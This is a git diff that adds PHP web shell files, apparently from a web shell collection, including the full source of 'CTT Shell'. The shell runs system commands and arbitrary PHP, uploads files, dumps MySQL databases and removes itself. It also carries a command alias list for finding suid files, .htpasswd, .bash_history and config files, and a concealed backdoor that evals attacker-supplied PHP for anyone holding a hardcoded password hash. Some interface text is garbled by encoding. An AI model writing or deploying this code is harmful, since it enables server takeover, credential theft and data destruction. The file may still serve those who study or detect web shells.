+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_theme"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA". +"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_url"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". 
+"fRQRADs=", +"ext_vbe"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH". +"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16". +"seAwLAEAOw==", +"ext_vbs"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ". +"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY". +"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==", +"ext_vcf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//". +"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4". +"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7", +"ext_wav"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wma"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_wmf"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ foreach($imgequals as $k=>$v)
+ {
+ if (in_array($img,$v)) {$img = $k;}
+ }
+ if (empty($arrimg[$img])) {$img = "small_unk";}
+ if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+ echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+ echo "<center>";
+ $k = array_keys($arrimg);
+ foreach ($k as $u)
+ {
+ echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
+ }
+ echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+
+<html>
+<head>
+</head>
+<body>
+<center> <br><br>
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+ <col width=1>
+ <col width=600>
+ <col width=1>
+ <tr> <td></td>
+ <td align=left class=texte>
+ <br> <form action='' method='post'> <input type='hidden' name='action' value='connect'>
+ <table border=0 align=center>
+ <col>
+ <col align=left>
+ <tr> <td colspan=2
align=center style='font:bold 9pt;font-family:verdana;'>
+ آâهنèٍه نàييûه نëے ïîنêë‏÷هيè‏ ê mySQL ٌهًâهًَ!<br><br>
+ </td>
+ </tr>
+ <tr> <td class=texte>ہنًهٌ ٌهًâهًà:</td>
+ <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+ </tr>
+ <tr> <td class=texte>حàçâàيèه لàçû:</td>
+ <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+ </tr>
+ <tr> <td class=texte>ثîمèي:</td>
+ <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+ </tr>
+ <tr> <td class=texte>دàًîëü</td>
+ <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+ </tr>
+ </table>
+ <br> <center> <br><br>
+ <input type='submit' value=' دîنêë‏÷èٌٍے ' class=form></center> </form> <br><br>
+ </td>
+ <td></td>
+ </tr>
+ <tr> <td height=1 colspan=3></td>
+ </tr>
+ </table> </center>
+ </body>
+ </html>
+
diff --git a/php/PHPshell/ctt_sh/ctt_sh.jpg b/php/PHPshell/ctt_sh/ctt_sh.jpg
new file mode 100644
index 0000000..f7192aa
Binary files /dev/null and b/php/PHPshell/ctt_sh/ctt_sh.jpg differ
diff --git a/php/PHPshell/ctt_sh/ctt_sh.php b/php/PHPshell/ctt_sh/ctt_sh.php
new file mode 100644
index 0000000..51ec008
--- /dev/null
+++ b/php/PHPshell/ctt_sh/ctt_sh.php
@@ -0,0 +1,2927 @@
+<?php
+$timelimit = 60;
+$sul = "?";
+$rd = "./";
+$shver = "0.1";
+$login = "";
+$pass = "";
+$md5_pass = "";
+$login = false;
+$autoupdate = true;
+$updatenow = false;
+$autochmod = 755;
+$filestealth = 1;
+$donated_html = "";
+$donated_act = array("");
+$host_allow = array("*");
+$curdir = "./";
+$tmpdir = dirname(__FILE__);
+$ftypes = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$nixpwdperpage = 9999;
+$bindport_pass = "ctt";
+$bindport_port = "11457";
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+$aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+$aliases[] = array("find all writable directories and files in current dir", "find . 
-perm -2 -ls");
+$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" 
width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d"); +$quicklaunch1 = array(); +$quicklaunch1[] = array("<b>دًîِهٌٌû</b>",$sul."act=ps_aux&d=%d"); +$quicklaunch1[] = array("<b>دàًîëè</b>",$sul."act=lsa&d=%d"); +$quicklaunch1[] = array("<b>تîىàينû</b>",$sul."act=cmd&d=%d"); +$quicklaunch1[] = array("<b>اàمًَçêà</b>",$sul."act=upload&d=%d"); +$quicklaunch1[] = array("<b>ءàçà</b>",$sul."act=sql&d=%d"); +$quicklaunch1[] = array("<b>PHP-تîن</b>",$sul."act=eval&d=%d"); +$quicklaunch1[] = array("<b>PHP-بيôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch1[] = array("<b>رàى َنàëے‏ٍ</b>",$sul."act=selfremove"); +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +@$f = $_GET[f]; +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; + + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + header("WWW-Authenticate: Basic realm=\"CTT SHELL\""); + header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); 
@eval($anyphpcode);} + exit; +} + +$lastdir = realpath("."); +chdir($curdir); + +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "ctshell.php";} + ctsh_getupdate(); + $data = file_get_contents($ctsh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} +if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} +else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); + +if (!function_exists("ct_sess_put")) +{ +function ct_sess_put($data) +{ + global $sess_method; + global $sess_cookie; + global $sess_file; + global $sess_data; + $sess_data = $data; + $data = serialize($data); + if ($sess_method == "file") + { + $fp = fopen($sess_file,"w"); + fwrite($fp,$data); + fclose($fp); + } + else {setcookie($sess_cookie,$data);} +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . 
" B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\","/",$d); + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} +else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} +if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (!is_dir($t)) {mkdir($t);} + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) + { + + return copy($d,$t); + } + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + error_reporting(9999); + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +$ret = true; +if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} +else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} +if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) {return rename($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +if (!is_dir($d.$o)) {unlink($d.$o);} +else {fs_rmdir($d.$o."/"); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); 
+ return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\","/",$o); + if (is_dir($o)) + { + if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ + function myshellexec($cmd) + { + return system($cmd); + } +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner['read'] = ($mode & 00400) ? "r" : "-"; + $owner['write'] = ($mode & 00200) ? "w" : "-"; + $owner['execute'] = ($mode & 00100) ? "x" : "-"; + $group['read'] = ($mode & 00040) ? "r" : "-"; + $group['write'] = ($mode & 00020) ? "w" : "-"; + $group['execute'] = ($mode & 00010) ? "x" : "-"; + $world['read'] = ($mode & 00004) ? "r" : "-"; + $world['write'] = ($mode & 00002) ? "w" : "-"; + $world['execute'] = ($mode & 00001) ? "x" : "-"; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";} + if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";} + if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";} + + return $type.$owner['read'].$owner['write'].$owner['execute']. + $group['read'].$group['write'].$group['execute']. 
+ $world['read'].$world['write'].$world['execute']; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("ctsh_getupdate")) +{ +function ctsh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($ctsh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { +if ($cv < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by ctShell.SQL v. ".$cv." +# Home page: http://.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." 
(".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { +if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} +$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); +if (!$res) {$ret[err][] = mysql_error();} +else +{ + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { +$keys = implode("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = addslashes($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; +$out .= $sql; + } + } +} + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { +fwrite ($fp, $out); +fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("ctfsearch")) +{ +function ctfsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." && $f != "..") + { +if (is_dir($d.$f)) +{ + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + ctfsearch($d.$f); +} +else +{ + if ($true) + { + if (!empty($a[text])) + { +$r = @file_get_contents($d.$f); +if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." 
";} +if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + +if ($a[text_regexp]) {$true = ereg($a[text],$r);} +else {$true = strinstr($a[text],$r);} +if ($a[text_not]) +{ + if ($true) {$true = false;} + else {$true = true;} +} +if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } +} + } + } + closedir($handle); +} +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=\"red\">ON (secure)</font>"; +} +else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "<font color=\"red\">".$v."</font>"; +} +else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE); + +@ini_set("highlight.bg",$highlight_bg); +@ini_set("highlight.comment",$highlight_comment); +@ini_set("highlight.default",$highlight_default); +@ini_set("highlight.html",$highlight_html); +@ini_set("highlight.keyword",$highlight_keyword); +@ini_set("highlight.string","#DD0000"); + +if ($act != "img") +{ +if (!is_array($actbox)) 
{$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> +<html> +<head> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +<meta http-equiv="Content-Language" content="en-us"><title> +CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title> +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT:#eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #105019 1px solid; +BORDER-TOP: #000000 1px solid; +BORDER-LEFT:#105019 1px solid; +BORDER-BOTTOM: #105019 1px solid; +} +.tr2 { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT:#eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.td2 { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT:#eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT:#cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #000000 1px; +BORDER-TOP: #cccccc 1px; +BORDER-LEFT:#cccccc 1px; +BORDER-BOTTOM: #000000 1px; +font: 7pt Verdana; +} +.tds1 { +BORDER-RIGHT: #505050 1px solid; +BORDER-TOP: #505050 1px solid; +BORDER-LEFT:#505050 1px solid; +BORDER-BOTTOM: #505050 1px solid; +font: 8pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT:#cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #000000 1px outset; +BORDER-TOP: #000000 1px outset; +BORDER-LEFT:#000000 1px outset; +BORDER-BOTTOM: #000000 1px outset; +BACKGROUND-COLOR: #000000; +} +.table2 { +BORDER-RIGHT: #000000 1px outset; +BORDER-TOP: #000000 1px outset; +BORDER-LEFT:#000000 1px outset; +BORDER-BOTTOM: #000000 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT:#999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; 
